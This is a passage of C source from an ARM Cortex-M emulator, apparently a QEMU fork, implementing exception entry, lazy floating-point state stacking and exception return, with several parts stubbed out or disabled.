(targets_secure) { if (dotailchain && !(lr & R_V7M_EXCRET_ES_MASK)) { /* * We took an exception from Secure to NonSecure * (which means the callee-saved registers got stacked) * and are now tailchaining to a Secure exception. * Clear DCRS so eventual return from this Secure * exception unstacks the callee-saved registers. */ lr &= ~R_V7M_EXCRET_DCRS_MASK; } } else { /* * We're going to a non-secure exception; push the * callee-saves registers to the stack now, if they're * not already saved. */ if (lr & R_V7M_EXCRET_DCRS_MASK && !(dotailchain && !(lr & R_V7M_EXCRET_ES_MASK))) { push_failed = v7m_push_callee_stack(cpu, lr, dotailchain, ignore_stackfaults); } lr |= R_V7M_EXCRET_DCRS_MASK; } } lr &= ~R_V7M_EXCRET_ES_MASK; if (targets_secure || !arm_feature(env, ARM_FEATURE_M_SECURITY)) { lr |= R_V7M_EXCRET_ES_MASK; } lr &= ~R_V7M_EXCRET_SPSEL_MASK; if (env->v7m.control[targets_secure] & R_V7M_CONTROL_SPSEL_MASK) { lr |= R_V7M_EXCRET_SPSEL_MASK; } /* * Clear registers if necessary to prevent non-secure exception * code being able to see register values from secure code. * Where register values become architecturally UNKNOWN we leave * them with their previous values. */ if (arm_feature(env, ARM_FEATURE_M_SECURITY)) { if (!targets_secure) { /* * Always clear the caller-saved registers (they have been * pushed to the stack earlier in v7m_push_stack()). * Clear callee-saved registers if the background code is * Secure (in which case these regs were saved in * v7m_push_callee_stack()). */ int i; for (i = 0; i < 13; i++) { /* r4..r11 are callee-saves, zero only if EXCRET.S == 1 */ if (i < 4 || i > 11 || (lr & R_V7M_EXCRET_S_MASK)) { env->regs[i] = 0; } } /* Clear EAPSR */ xpsr_write(env, 0, XPSR_NZCV | XPSR_Q | XPSR_GE | XPSR_IT); } } } if (push_failed && !ignore_stackfaults) { /* * Derived exception on callee-saves register stacking: * we might now want to take a different exception which * targets a different security state, so try again from the top. */ qemu_log_mask(CPU_LOG_INT, "...derived exception on callee-saves register stacking"); v7m_exception_taken(cpu, lr, true, true); return; } if (!arm_v7m_load_vector(cpu, exc, targets_secure, &addr)) { /* Vector load failed: derived exception */ qemu_log_mask(CPU_LOG_INT, "...derived exception on vector table load"); v7m_exception_taken(cpu, lr, true, true); return; } /* * Now we've done everything that might cause a derived exception * we can go ahead and activate whichever exception we're going to * take (which might now be the derived exception). */ armv7m_nvic_acknowledge_irq(env->nvic); /* Switch to target security state -- must do this before writing SPSEL */ switch_v7m_security_state(env, targets_secure); write_v7m_control_spsel(env, 0); arm_clear_exclusive(env); /* Clear SFPA and FPCA (has no effect if no FPU) */ env->v7m.control[M_REG_S] &= ~(R_V7M_CONTROL_FPCA_MASK | R_V7M_CONTROL_SFPA_MASK); /* Clear IT bits */ env->condexec_bits = 0; env->regs[14] = lr; env->regs[15] = addr & 0xfffffffe; env->thumb = addr & 1; arm_rebuild_hflags(env); #endif } bool armv7m_nvic_neg_prio_requested(void *opaque, bool secure) { return false; } static void v7m_update_fpccr(CPUARMState *env, uint32_t frameptr, bool apply_splim) { #if 0 /* * Like the pseudocode UpdateFPCCR: save state in FPCAR and FPCCR * that we will need later in order to do lazy FP reg stacking. */ bool is_secure = env->v7m.secure; void *nvic = env->nvic; /* * Some bits are unbanked and live always in fpccr[M_REG_S]; some bits * are banked and we want to update the bit in the bank for the * current security state; and in one case we want to specifically * update the NS banked version of a bit even if we are secure. */ uint32_t *fpccr_s = &env->v7m.fpccr[M_REG_S]; uint32_t *fpccr_ns = &env->v7m.fpccr[M_REG_NS]; uint32_t *fpccr = &env->v7m.fpccr[is_secure]; bool hfrdy, bfrdy, mmrdy, ns_ufrdy, s_ufrdy, sfrdy, monrdy; env->v7m.fpcar[is_secure] = frameptr & ~0x7; if (apply_splim && arm_feature(env, ARM_FEATURE_V8)) { bool splimviol; uint32_t splim = v7m_sp_limit(env); bool ign = armv7m_nvic_neg_prio_requested(nvic, is_secure) && (env->v7m.ccr[is_secure] & R_V7M_CCR_STKOFHFNMIGN_MASK); splimviol = !ign && frameptr < splim; *fpccr = FIELD_DP32(*fpccr, V7M_FPCCR, SPLIMVIOL, splimviol); } *fpccr = FIELD_DP32(*fpccr, V7M_FPCCR, LSPACT, 1); *fpccr_s = FIELD_DP32(*fpccr_s, V7M_FPCCR, S, is_secure); *fpccr = FIELD_DP32(*fpccr, V7M_FPCCR, USER, arm_current_el(env) == 0); *fpccr = FIELD_DP32(*fpccr, V7M_FPCCR, THREAD, !arm_v7m_is_handler_mode(env)); hfrdy = armv7m_nvic_get_ready_status(nvic, ARMV7M_EXCP_HARD, false); *fpccr_s = FIELD_DP32(*fpccr_s, V7M_FPCCR, HFRDY, hfrdy); bfrdy = armv7m_nvic_get_ready_status(nvic, ARMV7M_EXCP_BUS, false); *fpccr_s = FIELD_DP32(*fpccr_s, V7M_FPCCR, BFRDY, bfrdy); mmrdy = armv7m_nvic_get_ready_status(nvic, ARMV7M_EXCP_MEM, is_secure); *fpccr = FIELD_DP32(*fpccr, V7M_FPCCR, MMRDY, mmrdy); ns_ufrdy = armv7m_nvic_get_ready_status(nvic, ARMV7M_EXCP_USAGE, false); *fpccr_ns = FIELD_DP32(*fpccr_ns, V7M_FPCCR, UFRDY, ns_ufrdy); monrdy = armv7m_nvic_get_ready_status(nvic, ARMV7M_EXCP_DEBUG, false); *fpccr_s = FIELD_DP32(*fpccr_s, V7M_FPCCR, MONRDY, monrdy); if (arm_feature(env, ARM_FEATURE_M_SECURITY)) { s_ufrdy = armv7m_nvic_get_ready_status(nvic, ARMV7M_EXCP_USAGE, true); *fpccr_s = FIELD_DP32(*fpccr_s, V7M_FPCCR, UFRDY, s_ufrdy); sfrdy = armv7m_nvic_get_ready_status(nvic, ARMV7M_EXCP_SECURE, false); *fpccr_s = FIELD_DP32(*fpccr_s, V7M_FPCCR, SFRDY, sfrdy); } #endif } void HELPER(v7m_vlstm)(CPUARMState *env, uint32_t fptr) { /* fptr is the value of Rn, the frame pointer we store the FP regs to */ bool s = env->v7m.fpccr[M_REG_S] & R_V7M_FPCCR_S_MASK; bool lspact = env->v7m.fpccr[s] & R_V7M_FPCCR_LSPACT_MASK; uintptr_t ra = GETPC(); assert(env->v7m.secure); if (!(env->v7m.control[M_REG_S] & R_V7M_CONTROL_SFPA_MASK)) { return; } /* Check access to the coprocessor is permitted */ if (!v7m_cpacr_pass(env, true, arm_current_el(env) != 0)) { raise_exception_ra(env, EXCP_NOCP, 0, 1, GETPC()); } if (lspact) { /* LSPACT should not be active when there is active FP state */ raise_exception_ra(env, EXCP_LSERR, 0, 1, GETPC()); } if (fptr & 7) { raise_exception_ra(env, EXCP_UNALIGNED, 0, 1, GETPC()); } /* * Note that we do not use v7m_stack_write() here, because the * accesses should not set the FSR bits for stacking errors if they * fail. (In pseudocode terms, they are AccType_NORMAL, not AccType_STACK * or AccType_LAZYFP). Faults in cpu_stl_data_ra() will throw exceptions * and longjmp out. */ if (!(env->v7m.fpccr[M_REG_S] & R_V7M_FPCCR_LSPEN_MASK)) { bool ts = env->v7m.fpccr[M_REG_S] & R_V7M_FPCCR_TS_MASK; int i; for (i = 0; i < (ts ? 32 : 16); i += 2) { uint64_t dn = *aa32_vfp_dreg(env, i / 2); uint32_t faddr = fptr + 4 * i; uint32_t slo = extract64(dn, 0, 32); uint32_t shi = extract64(dn, 32, 32); if (i >= 16) { faddr += 8; /* skip the slot for the FPSCR */ } cpu_stl_data_ra(env, faddr, slo, ra); cpu_stl_data_ra(env, faddr + 4, shi, ra); } cpu_stl_data_ra(env, fptr + 0x40, vfp_get_fpscr(env), ra); /* * If TS is 0 then s0 to s15 and FPSCR are UNKNOWN; we choose to * leave them unchanged, matching our choice in v7m_preserve_fp_state. */ if (ts) { for (i = 0; i < 32; i += 2) { *aa32_vfp_dreg(env, i / 2) = 0; } vfp_set_fpscr(env, 0); } } else { v7m_update_fpccr(env, fptr, false); } env->v7m.control[M_REG_S] &= ~R_V7M_CONTROL_FPCA_MASK; } void HELPER(v7m_vlldm)(CPUARMState *env, uint32_t fptr) { uintptr_t ra = GETPC(); /* fptr is the value of Rn, the frame pointer we load the FP regs from */ assert(env->v7m.secure); if (!(env->v7m.control[M_REG_S] & R_V7M_CONTROL_SFPA_MASK)) { return; } /* Check access to the coprocessor is permitted */ if (!v7m_cpacr_pass(env, true, arm_current_el(env) != 0)) { raise_exception_ra(env, EXCP_NOCP, 0, 1, GETPC()); } if (env->v7m.fpccr[M_REG_S] & R_V7M_FPCCR_LSPACT_MASK) { /* State in FP is still valid */ env->v7m.fpccr[M_REG_S] &= ~R_V7M_FPCCR_LSPACT_MASK; } else { bool ts = env->v7m.fpccr[M_REG_S] & R_V7M_FPCCR_TS_MASK; int i; uint32_t fpscr; if (fptr & 7) { raise_exception_ra(env, EXCP_UNALIGNED, 0, 1, GETPC()); } for (i = 0; i < (ts ? 32 : 16); i += 2) { uint32_t slo, shi; uint64_t dn; uint32_t faddr = fptr + 4 * i; if (i >= 16) { faddr += 8; /* skip the slot for the FPSCR */ } slo = cpu_ldl_data_ra(env, faddr, ra); shi = cpu_ldl_data_ra(env, faddr + 4, ra); dn = (uint64_t) shi << 32 | slo; *aa32_vfp_dreg(env, i / 2) = dn; } fpscr = cpu_ldl_data_ra(env, fptr + 0x40, ra); vfp_set_fpscr(env, fpscr); } env->v7m.control[M_REG_S] |= R_V7M_CONTROL_FPCA_MASK; } static bool v7m_push_stack(ARMCPU *cpu) { /* * Do the "set up stack frame" part of exception entry, * similar to pseudocode PushStack(). * Return true if we generate a derived exception (and so * should ignore further stack faults trying to process * that derived exception.) */ bool stacked_ok = true, limitviol = false; CPUARMState *env = &cpu->env; uint32_t xpsr = xpsr_read(env); uint32_t frameptr = env->regs[13]; ARMMMUIdx mmu_idx = arm_mmu_idx(env); uint32_t framesize; bool nsacr_cp10 = extract32(env->v7m.nsacr, 10, 1); if ((env->v7m.control[M_REG_S] & R_V7M_CONTROL_FPCA_MASK) && (env->v7m.secure || nsacr_cp10)) { if (env->v7m.secure && env->v7m.fpccr[M_REG_S] & R_V7M_FPCCR_TS_MASK) { framesize = 0xa8; } else { framesize = 0x68; } } else { framesize = 0x20; } /* Align stack pointer if the guest wants that */ if ((frameptr & 4) && (env->v7m.ccr[env->v7m.secure] & R_V7M_CCR_STKALIGN_MASK)) { frameptr -= 4; xpsr |= XPSR_SPREALIGN; } xpsr &= ~XPSR_SFPA; if (env->v7m.secure && (env->v7m.control[M_REG_S] & R_V7M_CONTROL_SFPA_MASK)) { xpsr |= XPSR_SFPA; } frameptr -= framesize; if (arm_feature(env, ARM_FEATURE_V8)) { uint32_t limit = v7m_sp_limit(env); if (frameptr < limit) { /* * Stack limit failure: set SP to the limit value, and generate * STKOF UsageFault. Stack pushes below the limit must not be * performed. It is IMPDEF whether pushes above the limit are * performed; we choose not to. */ qemu_log_mask(CPU_LOG_INT, "...STKOF during stacking\n"); env->v7m.cfsr[env->v7m.secure] |= R_V7M_CFSR_STKOF_MASK; armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_USAGE, env->v7m.secure); env->regs[13] = limit; /* * We won't try to perform any further memory accesses but * we must continue through the following code to check for * permission faults during FPU state preservation, and we * must update FPCCR if lazy stacking is enabled. */ limitviol = true; stacked_ok = false; } } /* * Write as much of the stack frame as we can. If we fail a stack * write this will result in a derived exception being pended * (which may be taken in preference to the one we started with * if it has higher priority). */ stacked_ok = stacked_ok && v7m_stack_write(cpu, frameptr, env->regs[0], mmu_idx, STACK_NORMAL) && v7m_stack_write(cpu, frameptr + 4, env->regs[1], mmu_idx, STACK_NORMAL) && v7m_stack_write(cpu, frameptr + 8, env->regs[2], mmu_idx, STACK_NORMAL) && v7m_stack_write(cpu, frameptr + 12, env->regs[3], mmu_idx, STACK_NORMAL) && v7m_stack_write(cpu, frameptr + 16, env->regs[12], mmu_idx, STACK_NORMAL) && v7m_stack_write(cpu, frameptr + 20, env->regs[14], mmu_idx, STACK_NORMAL) && v7m_stack_write(cpu, frameptr + 24, env->regs[15], mmu_idx, STACK_NORMAL) && v7m_stack_write(cpu, frameptr + 28, xpsr, mmu_idx, STACK_NORMAL); if (env->v7m.control[M_REG_S] & R_V7M_CONTROL_FPCA_MASK) { /* FPU is active, try to save its registers */ bool fpccr_s = env->v7m.fpccr[M_REG_S] & R_V7M_FPCCR_S_MASK; bool lspact = env->v7m.fpccr[fpccr_s] & R_V7M_FPCCR_LSPACT_MASK; if (lspact && arm_feature(env, ARM_FEATURE_M_SECURITY)) { qemu_log_mask(CPU_LOG_INT, "...SecureFault because LSPACT and FPCA both set\n"); env->v7m.sfsr |= R_V7M_SFSR_LSERR_MASK; armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_SECURE, false); } else if (!env->v7m.secure && !nsacr_cp10) { qemu_log_mask(CPU_LOG_INT, "...Secure UsageFault with CFSR.NOCP because " "NSACR.CP10 prevents stacking FP regs\n"); armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_USAGE, M_REG_S); env->v7m.cfsr[M_REG_S] |= R_V7M_CFSR_NOCP_MASK; } else { if (!(env->v7m.fpccr[M_REG_S] & R_V7M_FPCCR_LSPEN_MASK)) { /* Lazy stacking disabled, save registers now */ int i; bool cpacr_pass = v7m_cpacr_pass(env, env->v7m.secure, arm_current_el(env) != 0); if (stacked_ok && !cpacr_pass) { /* * Take UsageFault if CPACR forbids access. The pseudocode * here does a full CheckCPEnabled() but we know the NSACR * check can never fail as we have already handled that. */ qemu_log_mask(CPU_LOG_INT, "...UsageFault with CFSR.NOCP because " "CPACR.CP10 prevents stacking FP regs\n"); armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_USAGE, env->v7m.secure); env->v7m.cfsr[env->v7m.secure] |= R_V7M_CFSR_NOCP_MASK; stacked_ok = false; } for (i = 0; i < ((framesize == 0xa8) ? 32 : 16); i += 2) { uint64_t dn = *aa32_vfp_dreg(env, i / 2); uint32_t faddr = frameptr + 0x20 + 4 * i; uint32_t slo = extract64(dn, 0, 32); uint32_t shi = extract64(dn, 32, 32); if (i >= 16) { faddr += 8; /* skip the slot for the FPSCR */ } stacked_ok = stacked_ok && v7m_stack_write(cpu, faddr, slo, mmu_idx, STACK_NORMAL) && v7m_stack_write(cpu, faddr + 4, shi, mmu_idx, STACK_NORMAL); } stacked_ok = stacked_ok && v7m_stack_write(cpu, frameptr + 0x60, vfp_get_fpscr(env), mmu_idx, STACK_NORMAL); if (cpacr_pass) { for (i = 0; i < ((framesize == 0xa8) ? 32 : 16); i += 2) { *aa32_vfp_dreg(env, i / 2) = 0; } vfp_set_fpscr(env, 0); } } else { /* Lazy stacking enabled, save necessary info to stack later */ v7m_update_fpccr(env, frameptr + 0x20, true); } } } /* * If we broke a stack limit then SP was already updated earlier; * otherwise we update SP regardless of whether any of the stack * accesses failed or we took some other kind of fault. */ if (!limitviol) { env->regs[13] = frameptr; } return !stacked_ok; } static void do_v7m_exception_exit(ARMCPU *cpu) { return; // FIXME CPUARMState *env = &cpu->env; uint32_t excret; uint32_t xpsr, xpsr_mask; bool ufault = false; bool sfault = false; bool return_to_sp_process; bool return_to_handler; bool rettobase = false; bool exc_secure = false; bool return_to_secure; bool ftype; bool restore_s16_s31; /* * If we're not in Handler mode then jumps to magic exception-exit * addresses don't have magic behaviour. However for the v8M * security extensions the magic secure-function-return has to * work in thread mode too, so to avoid doing an extra check in * the generated code we allow exception-exit magic to also cause the * internal exception and bring us here in thread mode. Correct code * will never try to do this (the following insn fetch will always * fault) so we the overhead of having taken an unnecessary exception * doesn't matter. */ if (!arm_v7m_is_handler_mode(env)) { return; } /* * In the spec pseudocode ExceptionReturn() is called directly * from BXWritePC() and gets the full target PC value including * bit zero. In QEMU's implementation we treat it as a normal * jump-to-register (which is then caught later on), and so split * the target value up between env->regs[15] and env->thumb in * gen_bx(). Reconstitute it. */ excret = env->regs[15]; if (env->thumb) { excret |= 1; } qemu_log_mask(CPU_LOG_INT, "Exception return: magic PC %" PRIx32 " previous exception %d\n", excret, env->v7m.exception); if ((excret & R_V7M_EXCRET_RES1_MASK) != R_V7M_EXCRET_RES1_MASK) { qemu_log_mask(LOG_GUEST_ERROR, "M profile: zero high bits in exception " "exit PC value 0x%" PRIx32 " are UNPREDICTABLE\n", excret); } ftype = excret & R_V7M_EXCRET_FTYPE_MASK; if (!ftype && !cpu_isar_feature(aa32_vfp_simd, cpu)) { qemu_log_mask(LOG_GUEST_ERROR, "M profile: zero FTYPE in exception " "exit PC value 0x%" PRIx32 " is UNPREDICTABLE " "if FPU not present\n", excret); ftype = true; } if (arm_feature(env, ARM_FEATURE_M_SECURITY)) { /* * EXC_RETURN.ES validation check (R_SMFL). We must do this before * we pick which FAULTMASK to clear. */ if (!env->v7m.secure && ((excret & R_V7M_EXCRET_ES_MASK) || !(excret & R_V7M_EXCRET_DCRS_MASK))) { sfault = 1; /* For all other purposes, treat ES as 0 (R_HXSR) */ excret &= ~R_V7M_EXCRET_ES_MASK; } exc_secure = excret & R_V7M_EXCRET_ES_MASK; } if (env->v7m.exception != ARMV7M_EXCP_NMI) { /* * Auto-clear FAULTMASK on return from other than NMI. * If the security extension is implemented then this only * happens if the raw execution priority is >= 0; the * value of the ES bit in the exception return value indicates * which security state's faultmask to clear. (v8M ARM ARM R_KBNF.) */ if (arm_feature(env, ARM_FEATURE_M_SECURITY)) { // if (armv7m_nvic_raw_execution_priority(env->nvic) >= 0) { // env->v7m.faultmask[exc_secure] = 0; // } } else { env->v7m.faultmask[M_REG_NS] = 0; } } #if 0 switch (armv7m_nvic_complete_irq(env->nvic, env->v7m.exception, exc_secure)) { case -1: /* attempt to exit an exception that isn't active */ ufault = true; break; case 0: /* still an irq active now */ break; case 1: /* * We returned to base exception level, no nesting. * (In the pseudocode this is written using "NestedActivation != 1" * where we have 'rettobase == false'.) */ rettobase = true; break; default: g_assert_not_reached(); } #endif return_to_handler = !(excret & R_V7M_EXCRET_MODE_MASK); return_to_sp_process = excret & R_V7M_EXCRET_SPSEL_MASK; return_to_secure = arm_feature(env, ARM_FEATURE_M_SECURITY) && (excret & R_V7M_EXCRET_S_MASK); if (arm_feature(env, ARM_FEATURE_V8)) { if (!arm_feature(env, ARM_FEATURE_M_SECURITY)) { /* * UNPREDICTABLE if S == 1 or DCRS == 0 or ES == 1 (R_XLCP); * we choose to take the UsageFault. */ if ((excret & R_V7M_EXCRET_S_MASK) || (excret & R_V7M_EXCRET_ES_MASK) || !(excret & R_V7M_EXCRET_DCRS_MASK)) { ufault = true; } } if (excret & R_V7M_EXCRET_RES0_MASK) { ufault = true; } } else { /* For v7M we only recognize certain combinations of the low bits */ switch (excret & 0xf) { case 1: /* Return to Handler */ break; case 13: /* Return to Thread using Process stack */ case 9: /* Return to Thread using Main stack */ /* * We only need to check NONBASETHRDENA for v7M, because in * v8M this bit does not exist (it is RES1). */ if (!rettobase && !(env->v7m.ccr[env->v7m.secure] & R_V7M_CCR_NONBASETHRDENA_MASK)) { ufault = true; } break; default: ufault = true; } } /* * Set CONTROL.SPSEL from excret.SPSEL. Since we're still in * Handler mode (and will be until we write the new XPSR.Interrupt * field) this does not switch around the current stack pointer. * We must do this before we do any kind of tailchaining, including * for the derived exceptions on integrity check failures, or we will * give the guest an incorrect EXCRET.SPSEL value on exception entry. */ write_v7m_control_spsel_for_secstate(env, return_to_sp_process, exc_secure); /* * Clear scratch FP values left in caller saved registers; this * must happen before any kind of tail chaining. */ if ((env->v7m.fpccr[M_REG_S] & R_V7M_FPCCR_CLRONRET_MASK) && (env->v7m.control[M_REG_S] & R_V7M_CONTROL_FPCA_MASK)) { if (env->v7m.fpccr[M_REG_S] & R_V7M_FPCCR_LSPACT_MASK) { env->v7m.sfsr |= R_V7M_SFSR_LSERR_MASK; armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_SECURE, false); qemu_log_mask(CPU_LOG_INT, "...taking SecureFault on existing " "stackframe: error during lazy state deactivation\n"); v7m_exception_taken(cpu, excret, true, false); return; } else { /* Clear s0..s15 and FPSCR */ int i; for (i = 0; i < 16; i += 2) { *aa32_vfp_dreg(env, i / 2) = 0; } vfp_set_fpscr(env, 0); } } if (sfault) { env->v7m.sfsr |= R_V7M_SFSR_INVER_MASK; armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_SECURE, false); qemu_log_mask(CPU_LOG_INT, "...taking SecureFault on existing " "stackframe: failed EXC_RETURN.ES validity check\n"); v7m_exception_taken(cpu, excret, true, false); return; } if (ufault) { /* * Bad exception return: instead of popping the exception * stack, directly take a usage fault on the current stack. */ env->v7m.cfsr[env->v7m.secure] |= R_V7M_CFSR_INVPC_MASK; armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_USAGE, env->v7m.secure); qemu_log_mask(CPU_LOG_INT, "...taking UsageFault on existing " "stackframe: failed exception return integrity check\n"); v7m_exception_taken(cpu, excret, true, false); return; } /* * Tailchaining: if there is currently a pending exception that * is high enough priority to preempt execution at the level we're * about to return to, then just directly take that exception now, * avoiding an unstack-and-then-stack. Note that now we have * deactivated the previous exception by calling armv7m_nvic_complete_irq() * our current execution priority is already the execution priority we are * returning to -- none of the state we would unstack or set based on * the EXCRET value affects it. */ // if (armv7m_nvic_can_take_pending_exception(env->nvic)) { // qemu_log_mask(CPU_LOG_INT, "...tailchaining to pending exception\n"); // v7m_exception_taken(cpu, excret, true, false); // return; // } switch_v7m_security_state(env, return_to_secure); { /* * The stack pointer we should be reading the exception frame from * depends on bits in the magic exception return type value (and * for v8M isn't necessarily the stack pointer we will eventually * end up resuming execution with). Get a pointer to the location * in the CPU state struct where the SP we need is currently being * stored; we will use and modify it in place. * We use this limited C variable scope so we don't accidentally * use 'frame_sp_p' after we do something that makes it invalid. */ uint32_t *frame_sp_p = get_v7m_sp_ptr(env, return_to_secure, !return_to_handler, return_to_sp_process); uint32_t frameptr = *frame_sp_p; bool pop_ok = true; ARMMMUIdx mmu_idx; bool return_to_priv = return_to_handler || !(env->v7m.control[return_to_secure] & R_V7M_CONTROL_NPRIV_MASK); mmu_idx = arm_v7m_mmu_idx_for_secstate_and_priv(env, return_to_secure, return_to_priv); if (!QEMU_IS_ALIGNED(frameptr, 8) && arm_feature(env, ARM_FEATURE_V8)) { qemu_log_mask(LOG_GUEST_ERROR, "M profile exception return with non-8-aligned SP " "for destination state is UNPREDICTABLE\n"); } /* Do we need to pop callee-saved registers? */ if (return_to_secure && ((excret & R_V7M_EXCRET_ES_MASK) == 0 || (excret & R_V7M_EXCRET_DCRS_MASK) == 0)) { uint32_t actual_sig; pop_ok = v7m_stack_read(cpu, &actual_sig, frameptr, mmu_idx); if (pop_ok && v7m_integrity_sig(env, excret) != actual_sig) { /* Take a SecureFault on the current stack */ env->v7m.sfsr |= R_V7M_SFSR_INVIS_MASK; armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_SECURE, false); qemu_log_mask(CPU_LOG_INT, "...taking SecureFault on existing " "stackframe: failed exception return integrity " "signature check\n"); v7m_exception_taken(cpu, excret, true, false); return; } pop_ok = pop_ok && v7m_stack_read(cpu, &env->regs[4], frameptr + 0x8, mmu_idx) && v7m_stack_read(cpu, &env->regs[5], frameptr + 0xc, mmu_idx) && v7m_stack_read(cpu, &env->regs[6], frameptr + 0x10, mmu_idx) && v7m_stack_read(cpu, &env->regs[7], frameptr + 0x14, mmu_idx) && v7m_stack_read(cpu, &env->regs[8], frameptr + 0x18, mmu_idx) && v7m_stack_read(cpu, &env->regs[9], frameptr + 0x1c, mmu_idx) && v7m_stack_read(cpu, &env->regs[10], frameptr + 0x20, mmu_idx) && v7m_stack_read(cpu, &env->regs[11], frameptr + 0x24, mmu_idx); frameptr += 0x28; } /* Pop registers */ pop_ok = pop_ok && v7m_stack_read(cpu, &env->regs[0], frameptr, mmu_idx) && v7m_stack_read(cpu, &env->regs[1], frameptr + 0x4, mmu_idx) && v7m_stack_read(cpu, &env->regs[2], frameptr + 0x8, mmu_idx) && v7m_stack_read(cpu, &env->regs[3], frameptr + 0xc, mmu_idx) && v7m_stack_read(cpu, &env->regs[12], frameptr + 0x10, mmu_idx) && v7m_stack_read(cpu, &env->regs[14], frameptr + 0x14, mmu_idx) && v7m_stack_read(cpu, &env->regs[15], frameptr + 0x18, mmu_idx) && v7m_stack_read(cpu, &xpsr, frameptr + 0x1c, mmu_idx); if (!pop_ok) { /* * v7m_stack_read() pended a fault, so take it (as a tail * chained exception on the same stack frame) */ qemu_log_mask(CPU_LOG_INT, "...derived exception on unstacking\n"); v7m_exception_taken(cpu, excret, true, false); return; } /* * Returning from an exception with a PC with bit 0 set is defined * behaviour on v8M (bit 0 is ignored), but for v7M it was specified * to be UNPREDICTABLE. In practice actual v7M hardware seems to ignore * the lsbit, and there are several RTOSes out there which incorrectly * assume the r15 in the stack frame should be a Thumb-style "lsbit * indicates ARM/Thumb" value, so ignore the bit on v7M as well, but * complain about the badly behaved guest. */ if (env->regs[15] & 1) { env->regs[15] &= ~1U; if (!arm_feature(env, ARM_FEATURE_V8)) { qemu_log_mask(LOG_GUEST_ERROR, "M profile return from interrupt with misaligned " "PC is UNPREDICTABLE on v7M\n"); } } if (arm_feature(env, ARM_FEATURE_V8)) { /* * For v8M we have to check whether the xPSR exception field * matches the EXCRET value for return to handler/thread * before we commit to changing the SP and xPSR. */ bool will_be_handler = (xpsr & XPSR_EXCP) != 0; if (return_to_handler != will_be_handler) { /* * Take an INVPC UsageFault on the current stack. * By this point we will have switched to the security state * for the background state, so this UsageFault will target * that state. */ armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_USAGE, env->v7m.secure); env->v7m.cfsr[env->v7m.secure] |= R_V7M_CFSR_INVPC_MASK; qemu_log_mask(CPU_LOG_INT, "...taking UsageFault on existing " "stackframe: failed exception return integrity " "check\n"); v7m_exception_taken(cpu, excret, true, false); return; } } if (!ftype) { /* FP present and we need to handle it */ if (!return_to_secure && (env->v7m.fpccr[M_REG_S] & R_V7M_FPCCR_LSPACT_MASK)) { armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_SECURE, false); env->v7m.sfsr |= R_V7M_SFSR_LSERR_MASK; qemu_log_mask(CPU_LOG_INT, "...taking SecureFault on existing stackframe: " "Secure LSPACT set but exception return is " "not to secure state\n"); v7m_exception_taken(cpu, excret, true, false); return; } restore_s16_s31 = return_to_secure && (env->v7m.fpccr[M_REG_S] & R_V7M_FPCCR_TS_MASK); if (env->v7m.fpccr[return_to_secure] & R_V7M_FPCCR_LSPACT_MASK) { /* State in FPU is still valid, just clear LSPACT */ env->v7m.fpccr[return_to_secure] &= ~R_V7M_FPCCR_LSPACT_MASK; } else { int i; uint32_t fpscr; bool cpacr_pass, nsacr_pass; cpacr_pass = v7m_cpacr_pass(env, return_to_secure, return_to_priv); nsacr_pass = return_to_secure || extract32(env->v7m.nsacr, 10, 1); if (!cpacr_pass) { armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_USAGE, return_to_secure); env->v7m.cfsr[return_to_secure] |= R_V7M_CFSR_NOCP_MASK; qemu_log_mask(CPU_LOG_INT, "...taking UsageFault on existing " "stackframe: CPACR.CP10 prevents unstacking " "FP regs\n"); v7m_exception_taken(cpu, excret, true, false); return; } else if (!nsacr_pass) { armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_USAGE, true); env->v7m.cfsr[M_REG_S] |= R_V7M_CFSR_INVPC_MASK; qemu_log_mask(CPU_LOG_INT, "...taking Secure UsageFault on existing " "stackframe: NSACR.CP10 prevents unstacking " "FP regs\n"); v7m_exception_taken(cpu, excret, true, false); return; } for (i = 0; i < (restore_s16_s31 ? 32 : 16); i += 2) { uint32_t slo, shi; uint64_t dn; uint32_t faddr = frameptr + 0x20 + 4 * i; if (i >= 16) { faddr += 8; /* Skip the slot for the FPSCR */ } pop_ok = pop_ok && v7m_stack_read(cpu, &slo, faddr, mmu_idx) && v7m_stack_read(cpu, &shi, faddr + 4, mmu_idx); if (!pop_ok) { break; } dn = (uint64_t)shi << 32 | slo; *aa32_vfp_dreg(env, i / 2) = dn; } pop_ok = pop_ok && v7m_stack_read(cpu, &fpscr, frameptr + 0x60, mmu_idx); if (pop_ok) { vfp_set_fpscr(env, fpscr); } if (!pop_ok) { /* * These regs are 0 if security extension present; * otherwise merely UNKNOWN. We zero always. */ for (i = 0; i < (restore_s16_s31 ? 32 : 16); i += 2) { *aa32_vfp_dreg(env, i / 2) = 0; } vfp_set_fpscr(env, 0); } } } FIELD_DP32(env->v7m.control[M_REG_S], V7M_CONTROL, FPCA, !ftype, env->v7m.control[M_REG_S]); /* Commit to consuming the stack frame */ frameptr += 0x20; if (!ftype) { frameptr += 0x48; if (restore_s16_s31) { frameptr += 0x40; } } /* * Undo stack alignment (the SPREALIGN bit indicates that the original * pre-exception SP was not 8-aligned and we added a padding word to * align it, so we undo this by ORing in the bit that increases it * from the current 8-aligned value to the 8-unaligned value. (Adding 4 * would work too but a logical OR is how the pseudocode specifies it.) */ if (xpsr & XPSR_SPREALIGN) { frameptr |= 4; } *frame_sp_p = frameptr; } xpsr_mask = ~(XPSR_SPREALIGN | XPSR_SFPA); if (!arm_feature(env, ARM_FEATURE_THUMB_DSP)) { xpsr_mask &= ~XPSR_GE; } /* This xpsr_write() will invalidate frame_sp_p as it may switch stack */ xpsr_write(env, xpsr, xpsr_mask); if (env->v7m.secure) { bool sfpa = xpsr & XPSR_SFPA; FIELD_DP32(env->v7m.control[M_REG_S], V7M_CONTROL, SFPA, sfpa, env->v7m.control[M_REG_S]); } /* * The restored xPSR exception field will be zero if we're * resuming in Thread mode. If that doesn't match what the * exception return excret specified then this is a UsageFault. * v7M requires we make this check here; v8M did it earlier. */ if (return_to_handler != arm_v7m_is_handler_mode(env)) { /* * Take an INVPC UsageFault by pushing the stack again; * we know we're v7M 